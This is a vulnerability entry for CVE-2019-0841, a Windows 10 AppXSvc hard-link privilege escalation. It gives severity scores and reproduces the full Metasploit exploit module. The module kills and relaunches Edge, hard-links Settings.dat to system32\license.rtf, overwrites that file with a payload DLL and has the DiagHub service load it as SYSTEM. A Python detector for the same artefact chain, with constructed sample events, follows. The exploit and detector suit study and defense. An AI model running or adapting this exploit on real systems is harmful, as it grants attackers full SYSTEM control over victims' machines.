CVSS3: 7.8 High
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.2 High
Access Vector: LOCAL
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.866 High
Percentile: 98.6%
There exists a privilege escalation vulnerability for Windows 10 builds prior to build 17763. Due to the AppXSvc's improper handling of hard links, a user can gain full privileges over a SYSTEM-owned file. The user can then utilize the new file to execute code as SYSTEM. This module employs a technique using the Diagnostics Hub Standard Collector Service (DiagHub) which was discovered by James Forshaw to load and execute a DLL as SYSTEM.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Exploit::EXE
  include Post::File
  include Post::Windows::Priv
  include Post::Windows::FileInfo
  include Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AppXSvc Hard Link Privilege Escalation',
        'Description' => %q{
          There exists a privilege escalation vulnerability for
          Windows 10 builds prior to build 17763. Due to the AppXSvc's
          improper handling of hard links, a user can gain full
          privileges over a SYSTEM-owned file. The user can then utilize
          the new file to execute code as SYSTEM.

          This module employs a technique using the Diagnostics Hub Standard
          Collector Service (DiagHub) which was discovered by James Forshaw to
          load and execute a DLL as SYSTEM.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Nabeel Ahmed', # Vulnerability discovery and PoC
          'James Forshaw', # Code creating hard links and communicating with DiagHub service
          'Shelby Pace' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2019-0841' ],
          [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
          [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
          [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
          [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
        ],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [
          [ 'Windows 10', { 'Platform' => 'win' } ]
        ],
        'DisclosureDate' => '2019-04-09',
        'DefaultTarget' => 0
      )
    )
  end

  # Builds from the initial Windows 10 release up to 1803 are affected;
  # 1809 (build 17763) and later carry the fix.
  def check
    version = get_version_info
    if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1803)
      return CheckCode::Appears
    elsif version.build_number >= Msf::WindowsVersion::Win10_InitialRelease
      return CheckCode::Detected
    end

    CheckCode::Unknown
  end

  # Copies a helper binary from the framework's data directory to the
  # target and registers it so FileDropper removes it during cleanup.
  def upload_file(file_name, file_path)
    contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
    write_file(file_path, contents)
    register_file_for_cleanup(file_path)
  rescue StandardError
    fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
  end

  # Starting Edge makes AppXSvc process Settings.dat, which now points
  # through the hard link at the SYSTEM-owned target file.
  def init_process
    print_status('Attempting to launch Microsoft Edge minimized.')
    cmd_exec('cmd.exe /c start /min microsoft-edge:', nil, 30)
  end

  # Runs the uploaded hard-link helper; it prints 'Done' on success.
  def mk_hard_link(src, target, link_exe)
    out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
    out && out.include?('Done')
  end

  # Replaces license.rtf with the payload DLL, keeping the original bytes
  # so cleanup can restore the file.
  def write_payload
    print_status('Writing the payload to disk')
    code = generate_payload_dll
    @original_data = read_file(@rtf_path)
    write_file(@rtf_path, code)
  end

  def exploit
    vuln_status = check
    fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown
    fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?

    # Edge must not hold Settings.dat open while the link is created
    cmd_exec('taskkill /F /IM MicrosoftEdge.exe /FI "STATUS eq RUNNING"')

    dat_path = expand_path('%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat')
    fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)

    if session.arch == ARCH_X86
      exe_name = 'CVE-2019-0841_x86.exe'
      f_name = 'diaghub_load_x86.exe'
    elsif session.arch == ARCH_X64
      exe_name = 'CVE-2019-0841_x64.exe'
      f_name = 'diaghub_load_x64.exe'
    else
      fail_with(Failure::NoTarget, "Unsupported session architecture: #{session.arch}")
    end

    link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
    upload_file(exe_name, link_file_name)

    @rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
    fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
    print_good('Successfully created hard link')

    init_process
    cmd_exec('taskkill /F /IM MicrosoftEdge.exe')
    write_payload

    diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
    upload_file(f_name, diaghub_path)

    cmd = "\"#{diaghub_path}\" \"license.rtf\""
    cmd_exec(cmd)
  end

  def cleanup
    folder_path = expand_path('%TEMP%\\etw')
    dir_rm(folder_path)

    # Only restore license.rtf if the original contents were actually saved;
    # @original_data stays nil when the exploit fails before write_payload.
    unless @rtf_path.nil? || @original_data.nil?
      write_file(@rtf_path, @original_data)
    end

    super
  end
end
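A defender-side correlation of the artefacts this module leaves behind (a non-SYSTEM write to system32\license.rtf followed by the DiagHub service loading that file), written here as an added example and not code from the page or the Metasploit module. The event records are constructed to resemble Sysmon IDs 1, 11 and 7, and the DiagHub service binary name is an assumption.

```python
"""Correlate Sysmon-style events for the artefact chain the module above produces.
Added detection example (not from the page or the module); events are constructed
to resemble Sysmon IDs 1, 11 and 7, and the DiagHub binary name is an assumption."""

LICENSE_RTF = r"c:\windows\system32\license.rtf"
DIAGHUB_IMAGE = "diagnosticshub.standardcollector.service.exe"  # assumed binary name
SYSTEM_USER = "nt authority\\system"

def stage_of(ev):
    """Return the chain stage an event belongs to, or None if it is unrelated."""
    eid = ev.get("eid")
    if eid == 1:
        cmd = ev.get("cmd", "").lower()
        if "microsoft-edge:" in cmd or ("taskkill" in cmd and "microsoftedge.exe" in cmd):
            return "edge_restart"  # weak alone: Edge bounced so AppXSvc touches Settings.dat
    elif eid == 11:
        # license.rtf is rewritten only by servicing as SYSTEM; a non-SYSTEM writer
        # means it was reached through a hard link or a changed ACL
        if ev.get("target", "").lower() == LICENSE_RTF and ev.get("user", "").lower() != SYSTEM_USER:
            return "license_rtf_overwrite"
    elif eid == 7:
        image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
        if image == DIAGHUB_IMAGE and not ev.get("loaded", "").lower().endswith(".dll"):
            return "diaghub_nondll_load"  # SYSTEM service loading a module that is not a .dll
    return None

def detect(events):
    """Walk events in order; alert only when the overwrite precedes the DiagHub load."""
    stages = [s for s in (stage_of(e) for e in events) if s]
    alert = ("license_rtf_overwrite" in stages and "diaghub_nondll_load" in stages
             and stages.index("license_rtf_overwrite") < stages.index("diaghub_nondll_load"))
    return {"stages": stages, "alert": alert}

# Constructed sample telemetry, not captured from a real host.
ATTACK_EVENTS = [
    {"eid": 1, "user": "DESKTOP\\alice", "cmd": "cmd.exe /c start /min microsoft-edge:"},
    {"eid": 1, "user": "DESKTOP\\alice", "cmd": "taskkill /F /IM MicrosoftEdge.exe"},
    {"eid": 11, "user": "DESKTOP\\alice", "target": r"C:\Windows\System32\license.rtf"},
    {"eid": 7, "image": r"C:\Windows\System32\DiagnosticsHub.StandardCollector.Service.exe",
     "loaded": r"C:\Windows\System32\license.rtf"},
]
BENIGN_EVENTS = [
    {"eid": 11, "user": "NT AUTHORITY\\SYSTEM", "target": r"C:\Windows\System32\license.rtf"},
    {"eid": 7, "image": r"C:\Windows\System32\DiagnosticsHub.StandardCollector.Service.exe",
     "loaded": r"C:\Windows\System32\ntdll.dll"},
]

if __name__ == "__main__":
    print(detect(ATTACK_EVENTS), detect(BENIGN_EVENTS))
```

The Edge start/kill events are kept as context only; the alert requires the ordered pair of the non-SYSTEM license.rtf write and the DiagHub load, which benign servicing does not produce.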